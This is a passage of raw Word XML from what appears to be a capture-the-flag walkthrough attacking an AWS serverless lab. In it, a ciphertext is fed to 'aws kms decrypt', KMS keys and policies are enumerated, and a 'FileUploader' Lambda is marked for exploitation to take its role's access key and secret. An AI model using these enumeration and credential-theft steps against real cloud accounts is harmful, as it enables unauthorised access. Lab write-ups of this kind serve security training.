                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId163">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="426960" cy="27000"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="0B9E263A" id="Ink 295" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:271.1pt;margin-top:82.25pt;width:42.1pt;height:19.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">
                <v:imagedata r:id="rId164"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"/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page31image66217104" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39FA7A96" wp14:editId="5C52C9BD">
            <wp:extent cx="5731510" cy="3561080"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="7620"/>
            <wp:docPr id="76" name="Picture 76" descr="page31image6621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age31image6621710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561080"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page31image66217312" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="593DB1DE" wp14:editId="2CD2F5B1">
            <wp:extent cx="5731510" cy="3567430"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="13970"/>
            <wp:docPr id="75" name="Picture 75" descr="page31image6621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age31image662173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567430"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A524511" w14:textId="4C71D0D3" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page32image66217728" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E4B227C" wp14:editId="0B9979F6">
            <wp:extent cx="5731510" cy="1415415"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="6985"/>
            <wp:docPr id="72" name="Picture 72" descr="page32image6621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age32image6621772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1415415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1B6698" w14:textId="77777777" w:rsidR="00376F79" w:rsidRDefault="00376F79" w:rsidP="0094232C"/>
    <w:p w14:paraId="024659DE" w14:textId="5FF243AE" w:rsidR="00376F79" w:rsidRDefault="0094232C" w:rsidP="00376F79">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The function requires three parameters, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>resourceUrl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">, username and password. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A49D50C" w14:textId="13B03522" w:rsidR="006642D5" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">If the parameters are passed, the function checks whether the username and password is present in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>DynnamoDB</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve"> "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>AllowedUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">" table. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF10A66" w14:textId="53C7C089" w:rsidR="006642D5" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">If it is present, it fetches the resource from the provided URL and stores it in the S3 bucket. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51306BA0" w14:textId="25279E4F" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00376F79">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">After that, the Encrypted ServerlessFLAG7 is decrypted. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2A1EF0" w14:textId="77777777" w:rsidR="006642D5" w:rsidRDefault="006642D5" w:rsidP="0094232C"/>
    <w:p w14:paraId="499DB9C8" w14:textId="6928D2C1" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Even if the function is invoked successfully, the ServerlessFLAG7 is not returned or printed, making it impossible to view the ServerlessFLAG7 directly. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09383793" w14:textId="77777777" w:rsidR="006642D5" w:rsidRDefault="006642D5" w:rsidP="0094232C"/>
    <w:p w14:paraId="42ED13A2" w14:textId="19E88B64" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00027484">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Step 39: ​Check whether the current user can decrypt the encrypted flag directly. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C170FDC" w14:textId="77777777" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="006642D5">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Commands: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC834E0" w14:textId="7C14E167" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="006642D5">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t>echo AQICAHi7+9ngknhMkz0sb+LYfPQ</w:t>
      </w:r>
      <w:r w:rsidR="00F9324D">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t xml:space="preserve">qw3Oupegu4Y5dqgMw9JThIQEsuEXoJgp7K5CCZmy4DGH aAAAAfjB8BgkqhkiG9w0BBwagbzBtAgEAMGgGCSqGSIb3DQEHATAeBglghkgBZQMEAS4wE QQMdjbjfhorKb6HMIG4AgEQgDuwWQVNClcMu1GQgZdJUj/RG/4vaFEdT8wfRKWEWTZz84O M443vrn41/Qy5qypysm+3729SJ7sCjOfuGg== | base64 -d &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t>cipherblob</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA159EF" w14:textId="77777777" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="006642D5">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aws kms decrypt --ciphertext-blob fileb://cipherblob </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7282B46D" w14:textId="77777777" w:rsidR="00DF3224" w:rsidRDefault="00DF3224" w:rsidP="0094232C"/>
    <w:p w14:paraId="6B03D028" w14:textId="5C70E80A" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page32image66218144" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3376DBEB" wp14:editId="24B0F196">
            <wp:extent cx="5731510" cy="1028065"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="13335"/>
            <wp:docPr id="71" name="Picture 71" descr="page32image6621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age32image6621814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1028065"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C55806D" w14:textId="77777777" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">The current user cannot decrypt the cipher. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131D695F" w14:textId="5298BDB3" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C"/>
    <w:p w14:paraId="74CA90BE" w14:textId="0DA6E461" w:rsidR="00DF3224" w:rsidRDefault="0094232C" w:rsidP="00027484">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Step 40: ​Check who can perform decrypt operation using the KMS key. List the KMS keys. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A600E8B" w14:textId="4219D9EF" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00DF3224">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The KMS key ARN was: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0179504B" w14:textId="77777777" w:rsidR="00DF3224" w:rsidRPr="00DF3224" w:rsidRDefault="0094232C" w:rsidP="00DF3224">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arn:aws:kms:ap-southeast-1:276384657722:key/42ff3c24-70f3-42bd-96db-d69792ec1b37 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACD13BA" w14:textId="77777777" w:rsidR="00DF3224" w:rsidRPr="00DF3224" w:rsidRDefault="00DF3224" w:rsidP="00DF3224">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="021ACAB5" w14:textId="260A0E23" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00DF3224">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kms list-keys </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DF3DEC" w14:textId="6F3D5F6C" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:lastRenderedPageBreak/>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page33image66218560" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2141139D" wp14:editId="307560B4">
            <wp:extent cx="5731510" cy="2861945"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="8255"/>
            <wp:docPr id="68" name="Picture 68" descr="page33image66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age33image662185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solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B754D6" w14:textId="77777777" w:rsidR="00DF3224" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">The key id of the key is 42ff3c24-70f3-42bd-96db-d69792ec1b37 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7965DA2A" w14:textId="77777777" w:rsidR="00DF3224" w:rsidRDefault="00DF3224" w:rsidP="0094232C"/>
    <w:p w14:paraId="0E617873" w14:textId="2FE200D9" w:rsidR="00661E5F" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Step 41: ​Retrieve the default policy associated with the key. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4EF985" w14:textId="58A6B458" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00661E5F">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kms get-key-policy --key-id 42ff3c24-70f3-42bd-96db-d69792ec1b37 --policy-name default </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A4B417" w14:textId="77777777" w:rsidR="00661E5F" w:rsidRDefault="00661E5F" w:rsidP="0094232C"/>
    <w:p w14:paraId="19C72D93" w14:textId="45CF9570" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page33image66219184" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="589A349E" wp14:editId="029C8766">
            <wp:extent cx="5731510" cy="1022350"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="19050"/>
            <wp:docPr id="67" name="Picture 67" descr="page33image6621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age33image6621918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022350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="092C141B" w14:textId="48B260A8" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C"/>
    <w:p w14:paraId="378231FA" w14:textId="77777777" w:rsidR="00661E5F" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:t>Step 42: ​Beautify the output generated in the previous step.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4FC204" w14:textId="77777777" w:rsidR="00A92918" w:rsidRDefault="0094232C" w:rsidP="00661E5F">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t>Command: ​</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0C1005" w14:textId="400790EE" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00661E5F">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aws kms get-key-policy --key-id 42ff3c24-70f3-42bd-96db-d69792ec1b37 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CF8335" w14:textId="77777777" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00661E5F">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--policy-name default --output text | python3 -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t>json.tool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE9579A" w14:textId="4EC85D96" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="00661E5F" w:rsidP="0094232C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251720704" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="77BB2439" wp14:editId="345EADD3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>819360</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1047553</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1851480" cy="86760"/>
                <wp:effectExtent l="88900" t="139700" r="92075" b="142240"/>
                <wp:wrapNone/>
                <wp:docPr id="283" name="Ink 283"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId171">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="1851480" cy="86760"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="218D0FA8" id="Ink 283" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:60.3pt;margin-top:74pt;width:154.3pt;height:23.8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">
                <v:imagedata r:id="rId172" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251719680" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="362D3418" wp14:editId="242EEB1B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>605880</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1311793</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="858600" cy="9000"/>
                <wp:effectExtent l="88900" t="139700" r="81280" b="143510"/>
                <wp:wrapNone/>
                <wp:docPr id="282" name="Ink 282"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId173">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="858600" cy="9000"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="43C5B39C" id="Ink 282" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:43.5pt;margin-top:94.8pt;width:76.1pt;height:17.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">
                <v:imagedata r:id="rId174"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"/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page34image66219808" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="075B1EDE" wp14:editId="024F112B">
            <wp:extent cx="5731510" cy="3217545"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="8255"/>
            <wp:docPr id="64" name="Picture 64" descr="page34image6621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age34image6621980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solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D2967E" w14:textId="2E524D4E" w:rsidR="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">The KMS key can only be used by either the root user or the role associated with the Lambda function. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266C6309" w14:textId="77777777" w:rsidR="00661E5F" w:rsidRPr="0094232C" w:rsidRDefault="00661E5F" w:rsidP="0094232C"/>
    <w:p w14:paraId="78455040" w14:textId="330FDAF0" w:rsidR="000F0C98" w:rsidRDefault="0094232C" w:rsidP="0058333B">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Step 43: ​In order to decrypt the encrypted flag, the lambda function will have to be exploited so that the Access Key and Secret of the role can be used to decrypt the flag. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E4612D" w14:textId="231503F3" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Check whether there are different versions of the lambda function. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140E435C" w14:textId="77777777" w:rsidR="000F0C98" w:rsidRDefault="000F0C98" w:rsidP="0094232C"/>
    <w:p w14:paraId="21414A20" w14:textId="77777777" w:rsidR="000F0C98" w:rsidRDefault="0094232C" w:rsidP="000F0C98">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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7270C97F" w14:textId="68F5300D" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="000F0C98">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​aws lambda list-versions-by-function --function-name </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t>FileUploader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEEF848" w14:textId="017C6E70" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C"/>
    <w:p w14:paraId="49B7D8C4" w14:textId="3B28C830" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="000F0C98" w:rsidP="0094232C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251722752" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="26949A2D" wp14:editId="7BC2680C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3724560</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3932828</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="886680" cy="11160"/>
                <wp:effectExtent l="88900" t="139700" r="91440" b="141605"/>
                <wp:wrapNone/>
                <wp:docPr id="286" name="Ink 286"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
